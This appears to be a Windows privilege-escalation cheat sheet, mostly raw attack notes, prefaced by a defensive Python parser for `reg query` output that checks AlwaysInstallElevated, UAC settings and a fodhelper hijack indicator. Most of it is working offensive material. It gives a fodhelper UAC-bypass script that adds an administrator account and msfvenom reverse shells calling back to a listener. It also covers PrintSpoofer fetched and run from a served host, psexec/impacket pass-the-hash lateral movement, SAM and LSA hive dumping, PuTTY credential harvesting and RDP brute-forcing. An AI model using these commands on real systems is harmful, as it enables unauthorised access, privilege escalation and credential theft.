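The AlwaysInstallElevated check earlier on this page and the UAC checks just above are all `reg query` calls whose answer depends on reading a DWORD correctly (both hives must be 1; EnableLUA and ConsentPromptBehaviorAdmin decide whether an auto-elevate bypass can apply at all). The block below is an added Python example, not code from this page, that parses `reg query` output and answers those questions, plus a defender-side check for the HKCU ms-settings key that the fodhelper technique stages. All sample outputs are constructed; the value meanings (ConsentPromptBehaviorAdmin 0 = no prompt, 2 = Always Notify, 5 = default) are documented Windows semantics, and the assumption that the ms-settings key is absent on a clean profile is stated in the code.

```python
# Constructed samples of `reg query` output (values chosen for the example, not from a real host)
HKLM_INSTALLER = (
    "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Installer\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\n")
HKCU_INSTALLER = (
    "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Installer\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\n")
KEY_MISSING = "ERROR: The system was unable to find the specified registry key or value.\n"
UAC_ENABLELUA = (
    "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\n"
    "    EnableLUA    REG_DWORD    0x1\n")
UAC_CONSENT = (
    "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\n"
    "    ConsentPromptBehaviorAdmin    REG_DWORD    0x5\n")
FODHELPER_KEY = (
    "HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\Shell\\Open\\command\n"
    "    (Default)    REG_SZ    C:\\Users\\viewer\\Desktop\\fodhelper.exe\n"
    "    DelegateExecute    REG_SZ\n")

def parse_reg_query(text):
    """{key_path: {value_name: (type, data)}} from `reg query` output; a missing key ('ERROR:') gives {}.
    Value names that contain spaces are not handled (rare, and not needed for these checks)."""
    result, cur = {}, None
    for line in text.splitlines():
        if not line.strip() or line.startswith("ERROR:"):
            continue
        if not line.startswith(" "):                 # key paths start in column 0
            cur = line.strip()
            result.setdefault(cur, {})
            continue
        parts = line.split(None, 2)                   # name, type, data (data may be absent)
        if cur is not None and len(parts) >= 2:
            result[cur][parts[0]] = (parts[1], parts[2] if len(parts) == 3 else "")
    return result

def dword(text, value_name):
    """Integer data of a REG_DWORD value anywhere in the output, or None if it is not present."""
    for values in parse_reg_query(text).values():
        if value_name in values and values[value_name][0] == "REG_DWORD":
            return int(values[value_name][1], 16)     # reg prints DWORDs as 0x...
    return None

def always_install_elevated(hklm_out, hkcu_out):
    """The page's rule: only when BOTH hives set AlwaysInstallElevated = 1 does msiexec install as SYSTEM."""
    return dword(hklm_out, "AlwaysInstallElevated") == 1 and dword(hkcu_out, "AlwaysInstallElevated") == 1

def uac_posture(enablelua_out, consent_out):
    """Describe UAC from EnableLUA and ConsentPromptBehaviorAdmin (absent values mean Windows defaults)."""
    if dword(enablelua_out, "EnableLUA") == 0:
        return "UAC disabled"
    consent = dword(consent_out, "ConsentPromptBehaviorAdmin")
    if consent == 0:
        return "UAC enabled, admins elevate without prompting"
    if consent == 2:
        return "UAC enabled, Always Notify (auto-elevating binaries such as fodhelper still prompt)"
    return "UAC enabled, default prompting (auto-elevating binaries run without a prompt)"

def fodhelper_hijack_staged(hkcu_out):
    """True when HKCU\\...\\ms-settings\\Shell\\Open\\command exists with a DelegateExecute value.
    Assumption: this key is absent on a clean profile, so its presence is a useful indicator."""
    for key, values in parse_reg_query(hkcu_out).items():
        if key.lower().endswith("\\ms-settings\\shell\\open\\command"):
            return "DelegateExecute" in values
    return False

if __name__ == "__main__":
    print("AlwaysInstallElevated:", always_install_elevated(HKLM_INSTALLER, HKCU_INSTALLER))
    print("UAC:", uac_posture(UAC_ENABLELUA, UAC_CONSENT))
    print("fodhelper key staged:", fodhelper_hijack_staged(FODHELPER_KEY))
```

Redirect each `reg query` on the host to a file and pass the file contents in; for the fodhelper indicator, the input is the output of `reg query HKCU\Software\Classes\ms-settings\Shell\Open\command`, which on a clean user profile is just the ERROR line.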
# Just Type these commands
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
# Expected: The operation completed successfully.
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
# Generate shell64.exe with msfvenom [see if it's 64bit process]
Name the shell after the .exe being launched (fodhelper.exe here, or whatever .exe is being run).
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe > <shell-x64.exe>
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Users\viewer\Desktop\fodhelper.exe" /f
# Execute fodhelper.exe again (try each of the variants below if one doesn't work)
# CHANGE NOTHING HERE, just the path try
C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\fodhelper.exe -WindowStyle Hidden"
cmd.exe /c "powershell Start-Process C:\Windows\System32\fodhelper.exe -WindowStyle Hidden"
C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\SysWOW64\fodhelper.exe -WindowStyle Hidden"
cmd.exe /c "powershell Start-Process C:\Windows\SysWOW64\fodhelper.exe -WindowStyle Hidden"
Notes from local machine
Used this script, seems to work:
function FodhelperUACBypass(){
    Param (
        #[String]$program = "cmd /c start C:\Windows\System32\cmd.exe" #default
        #[String]$program = "cmd.exe /c net user test456 Password456! /add"
        [String]$program = "cmd.exe /c net localgroup administrators test456 /add"
    )
    #Create Registry Structure
    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
    #Start fodhelper.exe
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
    #Cleanup
    Start-Sleep 3
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
}
.ODT - htdocs
Autorun
upnphost
Other Notes I had
nc 192.168.236.222 4444
whoami /priv
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
python3 -m http.server 80
powershell
iwr -uri http://192.168.45.234/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c powershell.exe
whoami
---
more note20.txt
Alex's password expired, but he's on holiday for the next 4 weeks. Password reset by IT to the default
more note2.txt
Default password for new resets will be WelcomeToWinter0121
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.234 LPORT=4444 -f dll > EnterpriseServiceOptional.dll
privesc tools
check if win-logon-creds are working
msf
use exploit/windows/smb/psexec
set PAYLOAD windows/x64/meterpreter/reverse_tcp
show targets
set TARGET X
use exploit/windows/smb/psexec_psh
Note: psexec & evil-winrm use port 5985 (PowerShell remote access)
psexec | smbexec | wmiexec
NOTE: psexec, smbexec will give SYSTEM shell. wmiexec will give user shell.
impacket-psexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
impacket-smbexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
impacket-wmiexec DOMAIN/USER:['PASS']@IP [-hashes :NTLMHASH]
evil-winrm
**NOTE:** evil-winrm usually gives **medium integrity shells** for added administrator accounts. Even if the new account has Administrator permissions, it cannot actually perform administrative actions from that shell.
# only USER, no DOMAIN needed
evil-winrm -i IP -u USER [-H NT-HASH | -p PASS]
# custom options
PS> menu
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
winexe
winexe -U 'DOMAIN/USER%PASS' //IP cmd.exe
pth-winexe
pth-winexe -U 'DOMAIN/USER%HASH' //IP cmd.exe
# --system needs local admin hash
pth-winexe [--system] -U 'administrator%NTLM:HASH' //IP cmd.exe
PsExec.exe
PS> .\PsExec64.exe -accepteula -i -s SHELL.exe
# i: Run process interactively
# s: Run remote process in the System account.
> PSExec64.exe -i -u "nt authority\local service" SHELL.exe
# u: Run process as user-account <>
# Run executable with a different user:pass
PS> .\PsExec.exe -accepteula -u USER -p PASS nc.exe IP PORT -e cmd.exe
Dump SAM
SAM Hash Format
username : rid : LM_hash : NT_hash
Empire Project
powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-PowerDump.ps1; Invoke-PowerDump}"
Manual
https://www.thehacker.recipes/a-d/movement/credentials/dumping/sam-and-lsa-secrets
# actual location
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\SYSTEM
# other locations
C:\Windows\System32\config\RegBack
C:\Windows\Repair
reg save hklm\sam c:\Users\Public\ksam
reg save hklm\system c:\Users\Public\ksystem
reg save hklm\security c:\Users\Public\ksecurity
# on kali
samdump2 ksystem ksam
impacket-secretsdump -sam ksam -security ksecurity -system ksystem LOCAL
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'
# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
Putty
If installed, might find creds
1) reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there
or try this:
2) . .\SessionGopher.ps1
3) Invoke-SessionGopher -Thorough
RDP Bruteforce
https://github.com/galkan/crowbar
You can use hydra, but this will probably work as well:
# ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist